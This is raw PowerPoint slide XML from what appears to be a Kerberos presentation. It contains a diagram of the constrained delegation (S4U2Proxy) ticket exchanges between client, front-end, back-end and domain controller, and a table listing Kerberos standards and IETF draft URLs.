            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Constrained Delegation (S4U2Proxy)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="直線コネクタ 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973280" y="1684020"/>
            <a:ext cx="0" cy="468000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812346" y="1684020"/>
            <a:ext cx="19050" cy="468000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5" name="テキスト ボックス 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389436" y="1257300"/>
            <a:ext cx="845820" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"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sz="1600" b="1" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DC</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="直線コネクタ 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1851926" y="1684020"/>
            <a:ext cx="0" cy="468000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a:off x="1375676" y="1257300"/>
            <a:ext cx="948424" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"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sz="1600" b="1" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Backend</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="直線コネクタ 57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926346" y="1684020"/>
            <a:ext cx="0" cy="468000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2503436" y="1257300"/>
            <a:ext cx="845820" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"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sz="1600" b="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frontend</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1"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70" name="テキスト ボックス 69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550370" y="1257300"/>
            <a:ext cx="845820" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"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sz="1600" b="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="直線コネクタ 72"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="831396" y="3954780"/>
            <a:ext cx="3151411" cy="0"/>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flipH="1">
            <a:off x="831396" y="2606040"/>
            <a:ext cx="3151412" cy="0"/>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flipH="1">
            <a:off x="821871" y="5097780"/>
            <a:ext cx="2094950" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="7030A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flipH="1">
            <a:off x="1849888" y="5470650"/>
            <a:ext cx="1076459" cy="0"/>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8" name="テキスト ボックス 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092348" y="3821430"/>
            <a:ext cx="3123792" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TGS Exchang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e for Front-end Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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92" name="テキスト ボックス 91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092348" y="2472690"/>
            <a:ext cx="3123792" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AS Exchange</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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93" name="テキスト ボックス 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3116988" y="5329680"/>
            <a:ext cx="3626712" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>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a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CS Exchange for</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Back-end Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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94" name="テキスト ボックス 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3116988" y="4964430"/>
            <a:ext cx="5036412" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>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a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TGS Exchange for Back-end</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Server with Client’s Ticket</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="96" name="直線コネクタ 95"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2926346" y="4351020"/>
            <a:ext cx="1044896" cy="0"/>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7" name="テキスト ボックス 96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092348" y="4217670"/>
            <a:ext cx="3283812" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CS Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for Front-end Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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98" name="円/楕円 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918452" y="3558540"/>
            <a:ext cx="105580" cy="106680"/>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テキスト ボックス 98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092348" y="3478530"/>
            <a:ext cx="3123792" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Front-end Server</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> access</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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103" name="円/楕円 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918452" y="2221230"/>
            <a:ext cx="105580" cy="106680"/>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テキスト ボックス 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092348" y="2141220"/>
            <a:ext cx="3123792" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logon</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66432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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0"/>
              <a:t>Kerberos Standards-Drafts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="395288" y="1212850"/>
          <a:ext cx="7924800" cy="4177792"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3962400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3962400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Standard or Draft Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Available from</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>The Kerberos Network Authentication Service (V5)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/internet-drafts/draft-ietf-cat-kerberos-revisions-04.txt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/internet-drafts/draft-ietf-cat-kerberos-pk-init-10.txt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>The Simple and Protected GSS-API Negotiation Mechanism (RFC2478)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/rfc/rfc2478.txt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Generating KDC Referrals to locate Kerberos realms</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/internet-drafts/draft-swift-win2k-krb-referrals-00.txt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>The Windows 2000 RC4-HMAC Kerberos encryption type</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/internet-drafts/draft-brezak-win2k-krb-rc4-hmac-01.txt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> : </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>User to User Kerberos Authentication using GSS-API</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/internet-drafts/draft-swift-win2k-krb-user2user-00.txt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Extension to Kerberos V5 For Additional Initial Encryption</a:t>
